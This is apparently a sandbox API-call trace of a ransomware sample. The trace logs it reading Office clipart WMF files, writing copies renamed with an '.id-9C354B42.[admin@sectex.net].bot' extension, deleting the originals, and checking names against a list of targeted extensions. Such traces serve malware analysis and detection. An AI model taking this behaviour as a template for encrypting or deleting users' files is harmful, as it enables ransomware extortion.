	[0149.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0149.990] GetLastError () returned 0x0
	[0149.990] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1b08, lpOverlapped=0x0) returned 1
	[0149.992] WriteFile (in: hFile=0x3fc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1b10, lpOverlapped=0x0) returned 1
	[0149.993] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.993] WriteFile (in: hFile=0x3fc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.993] SetEndOfFile (hFile=0x3fc) returned 1
	[0149.993] CloseHandle (hObject=0x3fc) returned 1
	[0149.993] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.993] SetEndOfFile (hFile=0x3e8) returned 1
	[0149.995] CloseHandle (hObject=0x3e8) returned 1
	[0149.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.995] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00919_.wmf")) returned 1
	[0149.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.996] lstrlenW (lpString=".doc") returned 4
	[0149.996] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.996] lstrlenW (lpString=".docx") returned 5
	[0149.996] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.996] lstrlenW (lpString=".pdf") returned 4
	[0149.996] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.996] lstrlenW (lpString=".xls") returned 4
	[0149.996] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.996] lstrlenW (lpString=".xlsx") returned 5
	[0149.996] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.996] lstrlenW (lpString=".ppt") returned 4
	[0149.996] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.996] lstrlenW (lpString=".zip") returned 4
	[0149.996] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.996] lstrlenW (lpString=".rar") returned 4
	[0149.996] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.996] lstrlenW (lpString=".bz2") returned 4
	[0149.996] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.997] lstrlenW (lpString=".7z") returned 3
	[0149.997] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.997] lstrlenW (lpString=".dbf") returned 4
	[0149.997] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.997] lstrlenW (lpString=".1cd") returned 4
	[0149.997] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.997] lstrlenW (lpString=".jpg") returned 4
	[0149.997] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.997] lstrlenW (lpString=".doc") returned 4
	[0149.997] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.997] lstrlenW (lpString=".docx") returned 5
	[0149.997] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.997] lstrlenW (lpString=".pdf") returned 4
	[0149.997] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.997] lstrlenW (lpString=".xls") returned 4
	[0149.997] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.997] lstrlenW (lpString=".xlsx") returned 5
	[0149.997] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.997] lstrlenW (lpString=".ppt") returned 4
	[0149.997] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.997] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.997] lstrlenW (lpString=".zip") returned 4
	[0149.997] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.997] lstrlenW (lpString=".rar") returned 4
	[0149.997] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.998] lstrlenW (lpString=".bz2") returned 4
	[0149.998] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.998] lstrlenW (lpString=".7z") returned 3
	[0149.998] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.998] lstrlenW (lpString=".dbf") returned 4
	[0149.998] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.998] lstrlenW (lpString=".1cd") returned 4
	[0149.998] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00919_.WMF") returned 63
	[0149.998] lstrlenW (lpString=".jpg") returned 4
	[0149.998] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.998] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.998] lstrlenW (lpString="J0086424.WMF") returned 12
	[0149.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.999] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17016) returned 1
	[0149.999] CloseHandle (hObject=0x3e8) returned 1
	[0149.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf")) returned 0x20
	[0149.999] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0149.999] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.999] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0150.000] GetLastError () returned 0x0
	[0150.000] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4278, lpOverlapped=0x0) returned 1
	[0150.031] WriteFile (in: hFile=0x3fc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4280, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4280, lpOverlapped=0x0) returned 1
	[0150.032] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.032] WriteFile (in: hFile=0x3fc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.032] SetEndOfFile (hFile=0x3fc) returned 1
	[0150.033] CloseHandle (hObject=0x3fc) returned 1
	[0150.033] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.033] SetEndOfFile (hFile=0x3e8) returned 1
	[0150.035] CloseHandle (hObject=0x3e8) returned 1
	[0150.035] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.035] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086424.wmf")) returned 1
	[0150.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.036] lstrlenW (lpString=".doc") returned 4
	[0150.036] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.036] lstrlenW (lpString=".docx") returned 5
	[0150.036] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0150.036] lstrlenW (lpString=".pdf") returned 4
	[0150.036] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.036] lstrlenW (lpString=".xls") returned 4
	[0150.036] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.036] lstrlenW (lpString=".xlsx") returned 5
	[0150.036] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0150.036] lstrlenW (lpString=".ppt") returned 4
	[0150.036] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.036] lstrlenW (lpString=".zip") returned 4
	[0150.036] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.036] lstrlenW (lpString=".rar") returned 4
	[0150.036] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.036] lstrlenW (lpString=".bz2") returned 4
	[0150.036] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.037] lstrlenW (lpString=".7z") returned 3
	[0150.037] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.037] lstrlenW (lpString=".dbf") returned 4
	[0150.037] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.037] lstrlenW (lpString=".1cd") returned 4
	[0150.037] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.037] lstrlenW (lpString=".jpg") returned 4
	[0150.037] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.037] lstrlenW (lpString=".doc") returned 4
	[0150.037] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.037] lstrlenW (lpString=".docx") returned 5
	[0150.037] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0150.037] lstrlenW (lpString=".pdf") returned 4
	[0150.037] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.037] lstrlenW (lpString=".xls") returned 4
	[0150.037] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.037] lstrlenW (lpString=".xlsx") returned 5
	[0150.037] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0150.037] lstrlenW (lpString=".ppt") returned 4
	[0150.037] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.037] lstrlenW (lpString=".zip") returned 4
	[0150.037] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.037] lstrlenW (lpString=".rar") returned 4
	[0150.038] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.038] lstrlenW (lpString=".bz2") returned 4
	[0150.038] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.038] lstrlenW (lpString=".7z") returned 3
	[0150.038] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.038] lstrlenW (lpString=".dbf") returned 4
	[0150.038] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.038] lstrlenW (lpString=".1cd") returned 4
	[0150.038] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63
	[0150.038] lstrlenW (lpString=".jpg") returned 4
	[0150.038] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.038] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.038] lstrlenW (lpString="J0086432.WMF") returned 12
	[0150.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0150.105] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=33434) returned 1
	[0150.105] CloseHandle (hObject=0x3dc) returned 1
	[0150.105] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf")) returned 0x20
	[0150.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0150.128] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.129] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0150.193] GetLastError () returned 0x0
	[0150.193] ReadFile (in: hFile=0x3ac, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x829a, lpOverlapped=0x0) returned 1
	[0150.221] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x82a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x82a0, lpOverlapped=0x0) returned 1
	[0150.222] ReadFile (in: hFile=0x3ac, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.222] WriteFile (in: hFile=0x3dc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.223] SetEndOfFile (hFile=0x3dc) returned 1
	[0150.223] CloseHandle (hObject=0x3dc) returned 1
	[0150.223] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.223] SetEndOfFile (hFile=0x3ac) returned 1
	[0150.225] CloseHandle (hObject=0x3ac) returned 1
	[0150.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.226] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf")) returned 1
	[0150.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.226] lstrlenW (lpString=".doc") returned 4
	[0150.226] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.226] lstrlenW (lpString=".docx") returned 5
	[0150.226] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0150.226] lstrlenW (lpString=".pdf") returned 4
	[0150.226] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.226] lstrlenW (lpString=".xls") returned 4
	[0150.226] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.226] lstrlenW (lpString=".xlsx") returned 5
	[0150.226] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0150.226] lstrlenW (lpString=".ppt") returned 4
	[0150.226] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.226] lstrlenW (lpString=".zip") returned 4
	[0150.227] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.227] lstrlenW (lpString=".rar") returned 4
	[0150.227] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.227] lstrlenW (lpString=".bz2") returned 4
	[0150.227] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.227] lstrlenW (lpString=".7z") returned 3
	[0150.227] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.227] lstrlenW (lpString=".dbf") returned 4
	[0150.227] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.227] lstrlenW (lpString=".1cd") returned 4
	[0150.227] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.227] lstrlenW (lpString=".jpg") returned 4
	[0150.227] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.330] lstrlenW (lpString=".doc") returned 4
	[0150.330] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.330] lstrlenW (lpString=".docx") returned 5
	[0150.330] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0150.331] lstrlenW (lpString=".pdf") returned 4
	[0150.331] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.331] lstrlenW (lpString=".xls") returned 4
	[0150.331] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.331] lstrlenW (lpString=".xlsx") returned 5
	[0150.331] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0150.331] lstrlenW (lpString=".ppt") returned 4
	[0150.331] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.331] lstrlenW (lpString=".zip") returned 4
	[0150.331] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.331] lstrlenW (lpString=".rar") returned 4
	[0150.331] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.331] lstrlenW (lpString=".bz2") returned 4
	[0150.331] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.331] lstrlenW (lpString=".7z") returned 3
	[0150.331] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.331] lstrlenW (lpString=".dbf") returned 4
	[0150.331] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.331] lstrlenW (lpString=".1cd") returned 4
	[0150.331] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.331] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63
	[0150.331] lstrlenW (lpString=".jpg") returned 4
	[0150.331] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.331] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.332] lstrlenW (lpString="J0090087.WMF") returned 12
	[0150.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0150.332] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=46936) returned 1
	[0150.332] CloseHandle (hObject=0x25c) returned 1
	[0150.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf")) returned 0x20
	[0150.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0150.333] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.333] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
